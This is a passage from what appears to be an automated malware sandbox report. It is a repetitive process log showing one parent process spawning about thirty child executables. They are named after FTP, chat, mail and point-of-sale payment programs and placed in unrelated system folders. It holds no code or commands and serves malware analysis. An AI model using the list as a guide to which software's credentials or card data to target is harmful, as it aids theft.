AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 481 os_tid = 0x890 Thread: id = 482 os_tid = 0x518 Process: id = "83" image_name = "icq.exe" filename = "c:\\program files\\dvd maker\\icq.exe" page_root = "0x64184000" os_pid = "0x7fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\DVD Maker\\icq.exe\" " cur_dir = "C:\\Program Files\\DVD Maker\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 483 os_tid = 0x880 Thread: id = 484 os_tid = 0x634 Process: id = "84" image_name = "leechftp.exe" filename = "c:\\program files (x86)\\uninstall information\\leechftp.exe" page_root = "0x63f97000" os_pid = "0x6c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Uninstall Information\\leechftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Uninstall Information\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 485 os_tid = 0x870 Thread: id = 486 os_tid = 0x738 Process: id = "85" image_name = "ncftp.exe" filename = "c:\\program files (x86)\\reference assemblies\\ncftp.exe" page_root = "0x657aa000" os_pid = "0x348" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\ncftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 487 os_tid = 0x860 Thread: id = 488 os_tid = 0x34c Process: id = "86" image_name = "notepad.exe" filename = "c:\\program files (x86)\\mozilla firefox\\notepad.exe" page_root = "0x654bc000" os_pid = "0x310" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Mozilla Firefox\\notepad.exe\" " cur_dir = "C:\\Program Files (x86)\\Mozilla Firefox\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 489 os_tid = 0x850 Thread: id = 490 os_tid = 0x270 Process: id = "87" image_name = "operamail.exe" filename = "c:\\program files (x86)\\windows photo viewer\\operamail.exe" page_root = "0x654cf000" os_pid = "0x54c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\operamail.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 491 os_tid = 0x840 Thread: id = 492 os_tid = 0x6a8 Process: id = "88" image_name = "outlook.exe" filename = "c:\\program files (x86)\\reference assemblies\\outlook.exe" page_root = "0x650e1000" os_pid = "0x7a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\outlook.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 493 os_tid = 0x830 Thread: id = 494 os_tid = 0x308 Process: id = "89" image_name = "pidgin.exe" filename = "c:\\program files (x86)\\windows photo viewer\\pidgin.exe" page_root = "0x648f4000" os_pid = "0x318" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\pidgin.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 495 os_tid = 0x820 Thread: id = 496 os_tid = 0x754 Process: id = "90" image_name = "scriptftp.exe" filename = "c:\\program files (x86)\\internet explorer\\scriptftp.exe" page_root = "0x64007000" os_pid = "0x524" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\scriptftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 497 os_tid = 0x810 Thread: id = 498 os_tid = 0x4fc Process: id = "91" image_name = "skype.exe" filename = "c:\\program files\\common files\\skype.exe" page_root = "0x6471a000" os_pid = "0x804" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Common Files\\skype.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 499 os_tid = 0x314 Thread: id = 500 os_tid = 0x808 Process: id = "92" image_name = "smartftp.exe" filename = "c:\\program files (x86)\\windows portable devices\\smartftp.exe" page_root = "0x6482d000" os_pid = "0x814" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\smartftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 501 os_tid = 0xbfc Thread: id = 502 os_tid = 0x818 Process: id = "93" image_name = "thunderbird.exe" filename = "c:\\program files\\windows portable devices\\thunderbird.exe" page_root = "0x64e40000" os_pid = "0x824" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 503 os_tid = 0xbf8 Thread: id = 504 os_tid = 0x828 Process: id = "94" image_name = "totalcmd.exe" filename = "c:\\program files\\internet explorer\\totalcmd.exe" page_root = "0x63f52000" os_pid = "0x834" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Internet Explorer\\totalcmd.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 505 os_tid = 0xbf4 Thread: id = 506 os_tid = 0x838 Process: id = "95" image_name = "trillian.exe" filename = "c:\\program files (x86)\\mozilla maintenance service\\trillian.exe" page_root = "0x63d65000" os_pid = "0x844" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\trillian.exe\" " cur_dir = "C:\\Program Files (x86)\\Mozilla Maintenance Service\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 507 os_tid = 0xbf0 Thread: id = 508 os_tid = 0x848 Process: id = "96" image_name = "webdrive.exe" filename = "c:\\program files\\common files\\webdrive.exe" page_root = "0x64777000" os_pid = "0x854" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Common Files\\webdrive.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 509 os_tid = 0xbec Thread: id = 510 os_tid = 0x858 Process: id = "97" image_name = "whatsapp.exe" filename = "c:\\program files\\windows defender\\whatsapp.exe" page_root = "0x63989000" os_pid = "0x864" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Defender\\whatsapp.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 511 os_tid = 0xbe8 Thread: id = 512 os_tid = 0x868 Process: id = "98" image_name = "winscp.exe" filename = "c:\\program files (x86)\\microsoft visual studio 8\\winscp.exe" page_root = "0x6419b000" os_pid = "0x874" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\winscp.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 513 os_tid = 0xbe4 Thread: id = 514 os_tid = 0x878 Process: id = "99" image_name = "yahoomessenger.exe" filename = "c:\\program files (x86)\\windows sidebar\\yahoomessenger.exe" page_root = "0x649ae000" os_pid = "0x884" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\yahoomessenger.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 515 os_tid = 0xbe0 Thread: id = 516 os_tid = 0x888 Process: id = "100" image_name = "active-charge.exe" filename = "c:\\program files\\dvd maker\\active-charge.exe" page_root = "0x651c1000" os_pid = "0x894" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\DVD Maker\\active-charge.exe\" " cur_dir = "C:\\Program Files\\DVD Maker\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 517 os_tid = 0xbdc Thread: id = 518 os_tid = 0x898 Process: id = "101" image_name = "accupos.exe" filename = "c:\\program files (x86)\\adobe\\accupos.exe" page_root = "0x649d4000" os_pid = "0x8a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\accupos.exe\" " cur_dir = "C:\\Program Files (x86)\\Adobe\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 519 os_tid = 0xbd8 Thread: id = 520 os_tid = 0x8a8 Process: id = "102" image_name = "afr38.exe" filename = "c:\\program files (x86)\\microsoft office\\afr38.exe" page_root = "0x640e7000" os_pid = "0x8b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\afr38.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 521 os_tid = 0xbd4 Thread: id = 522 os_tid = 0x8b8 Process: id = "103" image_name = "aldelo.exe" filename = "c:\\program files\\microsoft synchronization services\\aldelo.exe" page_root = "0x644f9000" os_pid = "0x8c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Microsoft Synchronization Services\\aldelo.exe\" " cur_dir = "C:\\Program Files\\Microsoft Synchronization Services\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 523 os_tid = 0xbd0 Thread: id = 524 os_tid = 0x8c8 Process: id = "104" image_name = "ccv_server.exe" filename = "c:\\program files (x86)\\microsoft office\\ccv_server.exe" page_root = "0x62e0c000" os_pid = "0x8d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\ccv_server.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 525 os_tid = 0xbcc Thread: id = 526 os_tid = 0x8d8 Process: id = "105" image_name = "centralcreditcard.exe" filename = "c:\\program files (x86)\\adobe\\centralcreditcard.exe" page_root = "0x6341e000" os_pid = "0x8e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\centralcreditcard.exe\" " cur_dir = "C:\\Program Files (x86)\\Adobe\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 527 os_tid = 0xbc8 Thread: id = 528 os_tid = 0x8e8 Process: id = "106" image_name = "creditservice.exe" filename = "c:\\program files\\windows media player\\creditservice.exe" page_root = "0x63630000" os_pid = "0x8f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Media Player\\creditservice.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 529 os_tid = 0xbc4 Thread: id = 530 os_tid = 0x8f8 Process: id = "107" image_name = "edcsvr.exe" filename = "c:\\program files (x86)\\windows sidebar\\edcsvr.exe" page_root = "0x63742000" os_pid = "0x904" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\edcsvr.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 531 os_tid = 0xbc0 Thread: id = 532 os_tid = 0x908 Process: id = "108" image_name = "fpos.exe" filename = "c:\\program files\\common files\\fpos.exe" page_root = "0x63054000" os_pid = "0x914" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Common Files\\fpos.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 533 os_tid = 0xbbc Thread: id = 534 os_tid = 0x918 Process: id = "109" image_name = "isspos.exe" filename = "c:\\program files (x86)\\microsoft.net\\isspos.exe" page_root = "0x62866000" os_pid = "0x924" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\isspos.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 535 os_tid = 0xbb8 Thread: id = 536 os_tid = 0x928 Process: id = "110" image_name = "mxslipstream.exe" filename = "c:\\program files\\windows portable devices\\mxslipstream.exe" page_root = "0x63d79000" os_pid = "0x934" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 537 os_tid = 0xbb4 Thread: id = 538 os_tid = 0x938 Process: id = "111" image_name = "omnipos.exe" filename = "c:\\program files (x86)\\windows nt\\omnipos.exe" page_root = "0x63d8b000" os_pid = "0x944" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\omnipos.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], 